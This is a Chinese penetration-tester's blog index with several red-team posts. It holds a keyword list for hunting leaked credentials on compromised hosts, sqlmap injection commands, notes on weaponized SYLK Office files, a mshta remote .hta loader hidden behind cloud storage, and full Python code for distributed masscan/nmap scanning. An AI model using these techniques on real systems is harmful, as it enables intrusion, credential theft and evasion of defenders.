发表于

敏感信息关键字集合

转载请注明出处:https://youngrichog.github.io/

思考

攻防世界里面缺少不了敏感信息的泄漏,多数的攻击案例里敏感信息泄漏是突破的小利器,为什么想要做一个这样的敏感信息关键字集合,是因为它可以辐射很多场景,其次就是好像没有人在做这件事?目前看好像是这样的。当然,不仅仅是关键字,如果没有关键字覆盖到,难道它是真的没有敏感信息泄漏吗?那不妨去思考敏感信息路径,有些凭据是泄漏在callback中

我简单罗列几个场景:

  1. 拿到目标机器权限后,通过自动化脚本快速完成目标机器上的敏感信息搜集。
  2. 本地对一些文件进行分析的时候,例如批量分析github。
  3. 扫描器的规则,被动识别,通过对request/response识别存在敏感信息泄漏的情况。

结果

目前还没有做优化,忽略大小写,后面会做一下,有想法的朋友可以私聊我。 :-)

名称 来源
AWS_ACCESS_KEY_ID AWS
AWS_SECRET_ACCESS_KEY AWS
AWS_DEFAULT_REGION AWS
END OPENSSH PRIVATE KEY SSH证书
_authToken npm token
AccessKeySecret 阿里云AK
accessKeyId 阿里云AK
access_key_secret 阿里云AK
NACOS_AUTH_TOKEN nacos token
kms_access_secret 阿里云KMS
kms_access_key 阿里云KMS
kms_endpoint 阿里云KMS
aliyuncs.com 阿里云OSS
GITHUB_TOKEN github token
BEGIN RSA PRIVATE KEY 证书
BEGIN CERTIFICATE 证书
jdbc:mysql: 数据库链接
jdbc:sqlserver 数据库链接
jdbc:oracle:thin 数据库链接
jdbc:postgresql 数据库链接
jdbc:hive 数据库链接
Authorization 其他
PRIVATE-TOKEN 其他
OAUTH-TOKEN 其他
accessKey 其他
accessToken 其他
AizaSy开头 GOOGLE_PLACE_API_KEY

更新:2021/8/7

发表于

mysql无密码登录

转载请注明出处:https://youngrichog.github.io/

今天ubuntu在装mysql的时候,发现装完使用mysql -u root -p,密码随便写/空都可以直接登录,后面在配数据库配置的时候,发现虽然我修改了root的密码,但是还是连接不上,去数据库一看mysql.user表,root对应的password为空,后面才发现是由于auth_socket插件导致的。

  • 首先,这种验证方式不要求输入密码,即使输入了密码也不验证。
  • 只能用 UNIX 的 socket 方式登陆,这就保证了只能本地登陆,用户在使用这种登陆方式时已经通过了操作系统的安全验证;
  • 操作系统的用户和 MySQL 数据库的用户名必须一致,例如你要登陆 MySQL 的 root 用户,必须用操作系统的 root 用户登陆。
1
2
mysql> select user,host,plugin  from mysql.user; //查看使用的插件
mysql> update user set plugin="mysql_native_password" where user='root'; //修改插件

简单记录下

发表于

Macos Office攻防

转载请注明出处:https://youngrichog.github.io/

(本文还没有写完,施工中👷‍♀️👷)

描述

最近看了看Macos下的攻防视角都有什么,之前的话有做过AppleScript,在mac <10.15还是屡试不爽的,舒服至极。但是针对于>10.15版本,好像自己没有什么积累,索性就开始研究研究,主要涉及到SYLK利用、权限维持、沙箱跳出等。

什么是SYLK?

SYLK 代表 SYmbolic LinkK,一种于 1980 年代引入的文件格式。通常,SYLK 文件的文件扩展名为 .slk。SYLK 是一种仅使用可显示的 ANSI 字符的文件格式,创建它是为了在应用程序(例如电子表格和数据库)之间交换数据。

尽管是一种古老的文件格式,但文件扩展名 .slk 在最新的 MS Office 版本(在 2010、2013 、2016和2019)仍然默认映射到 Excel。

说说SYLK的优点?

SYLK 格式吸引攻击者的一个重要原因是:受保护的视图沙箱不适用于这种文件格式。这意味着,如果武器化 SYLK 文件是通过电子邮件或 Web 传送的,并且应用了Web 标记标记,则目标用户不会被此警告消息打扰。

此外,扩展名为 .slk 的 SYLK 文件具有以下特征。

嗯,的确是一个武器化的理想选择。简单点说SYLK就是一个old school,可以兼容新版Office,并且不在大众的视野里。

阅读全文 »

发表于

sqlmap –fresh-queries小记

转载请注明出处:https://youngrichog.github.io/

描述

好几周之前遇到一个这样的问题,每次我想–dump一遍新的数据或者想–count一遍新的数量,会把对应的log等删除掉或者使用–flush-session,那会遇到一个问题,就是注入会重新跑一遍包括一系列各种测试,后续查阅sqlmap文档发现了–fresh-queries参数

解决

–fresh-queries参数会忽略session缓存,重新查询

发表于

sqlmap –eval小记

转载请注明出处:https://youngrichog.github.io/

描述

偶然机会接触到了sqlmap –eval参数,特意记录一下,感觉以前都没有用到过 :-(

注入点是这样的:http://xxxxxx.com/?id=一段bas64

base64解开是{“a”:”1”,”b”:”2”,”c”:”3”}

注入点发生在a这个值上,思前想后貌似sqlmap tamper中没有,然后bingo

解决

1
sqlmap -u "http://xxxxxx.com/?id=" --eval "import base64; p=base64.b64encode('{\"a\":\"%s\",\"b\":\"2\",\"c\":\"3\"}'%p)"

发表于

Electron客户端漏洞挖掘

转载请注明出处:https://youngrichog.github.io/

描述

最近一段时间都在研究客户端相关的漏洞,想着能在客户端漏洞挖掘方向有所突破,做为一个多年混迹于Web安全的🐶来说,换换口味去尝试新的方向也不错,2018年看到大佬没用多长时间就挖掘到客户端RCE漏洞的我眼红了,2019年偶然间和大佬撞洞了,从此激发了我对客户端漏洞的向往。

本文中基本不含二进制安全相关内容,主要是从Web安全的视角去学习挖掘使用Electron做跨平台桌面的应用。

基本的学习思路:乌云漏洞镜像–>搜索关键字“客户端命令执行”、“客户端漏洞”、“客户端远程命令执行”–>遇到不懂的名词进行搜索和学习–>遇到需要学习的内容记录下来,然后后续进行学习–>对一些漏洞发现和漏洞利用的点进行思考

前前后后记录了一些:

1.UXSS是什么?如何利用?

2.文件名如何修改为../../../../../../xxx/xxxx这种?

3.特权域如何查找?例如百度浏览器baidu.com都是特权域

4.RFD攻击是什么?

阅读全文 »

发表于

巧用OSS对抗记

转载请注明出处:https://youngrichog.github.io/

描述

在某次红蓝对抗中,发现自己的小马被防守方获取到,由此开始想招对抗防守方。主要场景是我使用mshta http://x.x.x.x/123.hta 进行远程命令执行,但是由于环境所困没办法使用https,害怕由于使用https出现”此网站的安全证书存在问题”,需要受害者二次点击影响效果。

后续对风险面分析,我的小马会释放一个hta到本地,然后在mshta本地hta,为什么要这样做?缘由是这样的,如果通过mshta直接进行远程文件的下载是会出现跨域同源策略的问题,当然通过命令下载(bitsadmin、certutil···等等),也是为了避免去使用命令下载才使用编写XMLHTTP Request进行下载。所以我通过scripting.filesystemobject又写了一个hta到本地,继续mshta本地hta文件,这样就可以把上述问题解决。我也期待有其他解决方案,希望大家可以一起交流 :-)

回到重点,想在网络上将隐藏的好一些,那么如何能不弹”此网站的安全证书存在问题”?后来大佬说OSS可以,然后我就去对OSS进行了解,发现镜像回源的功能可以实现,当然直接文件丢OSS任何人都可以下载,最终利用该功能配合脚本解决。

这里的OSS指的是阿里云-对象存储OSS

阅读全文 »

发表于

HW红队攻击方案

转载请注明出处:https://youngrichog.github.io/**

描述

HW行动近些年关注度持续提升,站在攻击方的角度,我们应该如何完成HW任务。对标真实战争的红方和蓝方,指挥部都会有对应的作战手册,例如:美国海军陆战队。那么回到HW中的红队,我们也应该有相应的作战手册,一个完整的作战手册可以让队伍有序战斗,可以有效提高队伍的攻击效率。因此作战手册尤为重要。

HW防守方目标众多,如何对目标进行快速的信息搜集?根据以往的渗透来说,前期的信息搜集是一个非常耗时间的工作,需要人工参与的场景比较多,那么我们就需要思考如果缩短时间,提高效率。

基础设施建设+作战手册·····

阅读全文 »

发表于

简单分布式Masscan+Nmap

转载请注明出处:https://youngrichog.github.io/

描述

主要从如何开始快速部署、扫描来思考,想在几天之内完成十几万台的端口扫描和指纹识别,然后就简简单单造个轮子,后续不停的扩容机器数量

通过Masscan+Nmap+Redis实现,我们只需要把db:1的数据给丢上去,然后开masscan_agent不断的去取db:0的数据进行端口扫描,nmap_agent不断的去取db:1的数据进行指纹识别

db:0

该数据库主要存储待扫描的IP/IP段

db:1

该数据主要存储已经扫描完成的ip:port

img

具体实现

Massscan Agent 代码实现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#! /usr/bin/env python3
# -*- coding:utf-8 -*-

import masscan,redis,time

def consumer():
	while True:
		print('key:',r.keys())
		if len(r.keys()) >0:
			_key = r.randomkey()
			ip = r.get(_key)
			r.delete(_key)
			status = masscan_plugin(ip)
		else:
			print('[*] 等待中···')
			time.sleep(60)


def masscan_plugin(ip):
	try:
		mas = masscan.PortScanner()
		mas.scan(ip,ports='1-65535',arguments='-Pn --max-rate=2000')
		result = mas.scan_result['scan']
		for key,value in result.items():
			_len = len(value['tcp'].keys())
			if _len < 50:
        #过滤超过开了50个端口的ip,因为ids等原因导致
				for k,kk in value['tcp'].items():
					print(key+':'+str(k),key+':'+str(k))
					rr.set(key+':'+str(k),key+':'+str(k))
	except Exception as e:
		print('Masscan Error:',e)


if __name__ == '__main__':
	pool = redis.ConnectionPool(host='x.x.x.x',port=6379,password='xxxxx',decode_responses=True,db=0)
	r = redis.Redis(connection_pool=pool)

	pool_1 = redis.ConnectionPool(host='x.x.x.x',port=6379,password='xxxxx',decode_responses=True,db=1)
	rr = redis.Redis(connection_pool=pool_1)

	consumer()

Nmap Agent 代码实现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#! /usr/bin/env python3
# -*- coding:utf-8 -*-

import queue,nmap,threading,redis,time

def consumer():
	while True:
		if len(r.keys()) > 0:
			_keys = r.keys()
			_keylist = _keys[:10]
			for ip in _keylist:
				Queue.put(ip)
				r.delete(ip)
			threadscan()
		else:
			print('[*] 等待中···')
			time.sleep(60)

def nmap_plugin():
	while not Queue.empty():
		_ipport = Queue.get()
		ip = _ipport.split(':')[0]
		port = _ipport.split(':')[1]
		nm = nmap.PortScanner()
		print('[*] 开始扫描:%s,%s' %(ip,port))
		try:
			nm.scan(ip,arguments='-sV -T4 -Pn --version-all -p{}'.format(port))
			with open('nmap_res.txt','a+') as f:
				f.write(nm.csv())
		except Exception as e:
			print('[*] Nmap Error:',e)

def threadscan():
	Threads = []
	for i in range(10):
		thread_hi = threading.Thread(target=nmap_plugin)
		thread_hi.start()
		Threads.append(thread_hi)
	for t in Threads:
		t.join()

def main():
	consumer()


if __name__ == '__main__':
	pool = redis.ConnectionPool(host='x.x.x.x',port=6379,password='xxxxx',decode_responses=True,db=1)
	r = redis.Redis(connection_pool=pool)

	Queue = queue.Queue()
	main()

Producer 代码实现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#! /usr/bin/env python3
# -*- coding:utf-8 -*-

import redis

def producer():
	with open('iplist.txt','r') as f:
		num = 0
		for i in f:
			num += 1
			print('Insert:',num,i.rstrip())
			r.set(num,i.rstrip())
			
if __name__ == '__main__':
	pool = redis.ConnectionPool(host='x.x.x.x',port=6379,password='xxxxx',decode_responses=True,db=0)
	r = redis.Redis(connection_pool=pool)

	producer()

通过pssh我们可以批量ssh执行命令,pscp可以批量上传文件

pssh遇到公私钥登陆的时候会要选择yes/no,然后加上-O StrictHostKeyChecking=no就可以了

1
pssh -h iplist.txt -O StrictHostKeyChecking=no -P "whoami"

批量上传

1
pscp -h iplist.txt masscanAgent.py /tmp/

批量执行Agent并挂在后台

1
pssh -h iplist.txt -P "screen -dmS 'masscanAgent' bash -c 'python3 /tmp/masscanAgent.py'"